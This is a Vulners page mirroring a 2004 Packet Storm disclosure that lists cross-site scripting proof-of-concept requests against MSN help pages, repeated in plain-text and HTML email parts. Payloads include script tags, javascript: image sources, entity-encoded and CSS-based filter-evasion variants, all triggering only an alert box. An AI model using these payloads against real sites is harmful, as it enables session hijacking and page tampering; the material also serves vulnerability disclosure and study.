Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

msnXSS.txt

🗓️ 12 Dec 2004 00:00:00Reported by Jamie FisherType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 52 Views

XSS vulnerabilities in MSN documented with examples and corresponding URLs for exploitation methods.

Code
`--0-821799311-1102416389=:1811  
Content-Type: text/plain; charset=iso-8859-1  
Content-Transfer-Encoding: 8bit  
  
This is gonna be quick'n'dirty. My dinner is almost cooked...  
  
More XSS for MSN to add to the list:  
  
1. Cross site scripting (In JavaScript context)  
  
http://help.msn.com/en_au/DirectedHelpControls.asp  
  
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0  
  
2 Cross site scripting (Standard variants)  
  
http://help.msn.com/EN_AU/Search/xfind_utf8.asp  
  
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0  
  
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0  
  
3 Cross site scripting (Standard variants)  
  
http://help.msn.com/en_au/DirectedHelpControls.asp  
  
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
4 Cross site scripting using HTML entities  
  
http://help.msn.com/EN_AU/Search/xfind_utf8.asp  
  
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0  
  
5 Cross site scripting using HTML entities  
  
http://help.msn.com/en_au/DirectedHelpControls.asp  
  
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
6 Cross site scripting without using '<' and '>' symbols  
  
http://help.msn.com/EN_AU/Search/xfind_utf8.asp  
  
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0  
  
7 Cross site scripting without using '<' and '>' symbols  
  
http://help.msn.com/en_au/directedhelp.asp  
  
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0  
  
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0  
  
I won't say how to fix. The last time I ran XSS by a website (Kevin Mitnicks), some nematode <">http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix. Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.  
  
<!--# Greets:  
Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->  
  
  
  
  
  
---------------------------------  
Moving house? Beach bar in Thailand? New Wardrobe? Win £10k with Yahoo! Mail to make your dream a reality.  
  
  
---------------------------------  
Win a castle for NYE with your mates and Yahoo! Messenger   
--0-821799311-1102416389=:1811  
Content-Type: text/html; charset=iso-8859-1  
Content-Transfer-Encoding: 8bit  
  
<DIV>  
<BLOCKQUOTE class=replbq style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #1010ff 2px solid">  
<DIV>This is gonna be quick'n'dirty.&nbsp; My dinner is almost cooked...</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>More XSS for MSN to add to the list:</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1. Cross site scripting (In JavaScript context)</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/en_au/DirectedHelpControls.asp">http://help.msn.com/en_au/DirectedHelpControls.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>2 Cross site scripting (Standard variants)</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/EN_AU/Search/xfind_utf8.asp">http://help.msn.com/EN_AU/Search/xfind_utf8.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>3 Cross site scripting (Standard variants)</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/en_au/DirectedHelpControls.asp">http://help.msn.com/en_au/DirectedHelpControls.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>4 Cross site scripting using HTML entities</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/EN_AU/Search/xfind_utf8.asp">http://help.msn.com/EN_AU/Search/xfind_utf8.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>5 Cross site scripting using HTML entities</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/en_au/DirectedHelpControls.asp">http://help.msn.com/en_au/DirectedHelpControls.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>6 Cross site scripting without using '<' and '>' symbols</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/EN_AU/Search/xfind_utf8.asp">http://help.msn.com/EN_AU/Search/xfind_utf8.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>7 Cross site scripting without using '<' and '>' symbols</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><A href="http://help.msn.com/en_au/directedhelp.asp">http://help.msn.com/en_au/directedhelp.asp</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>I won't say how to fix.&nbsp; The last&nbsp;time I ran XSS by a website (Kevin Mitnicks), some nematode <<A href="http://nematode.unl.edu/wormgen.htm>">http://nematode.unl.edu/wormgen.htm></A> refuted my mitigating fix.&nbsp; Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><!--# Greets:</DIV>  
<DIV>&nbsp;Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently --></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>&nbsp;</DIV>  
<P>  
<HR SIZE=1>  
<FONT face=Arial size=2>Moving house? Beach bar in Thailand? New Wardrobe? <A href="http://uk.rd.yahoo.com/evt=29276/*http://uk.docs.yahoo.com/mail/bulldog/index.html">Win £10k with Yahoo! Mail</A> to make your dream a reality.</FONT></BLOCKQUOTE></DIV><p>  
<hr size=1><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://uk.rd.yahoo.com/evt=28672/*http://www.yahoo.co.uk/popularity"><strong><font face="Arial, Helvetica, sans-serif">Win a castle</font></strong></a><font face="Arial, Helvetica, sans-serif"><strong>   
for NYE with your mates and Yahoo! Messenger</strong></font><strong><font color="#FF9900">   
</font></strong></font>  
--0-821799311-1102416389=:1811--  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Dec 2004 00:00Current
7.4High risk
Vulners AI Score7.4
xss vulnerabilitiescross site scriptingmsn securityjavascript contextexploitation examples.
52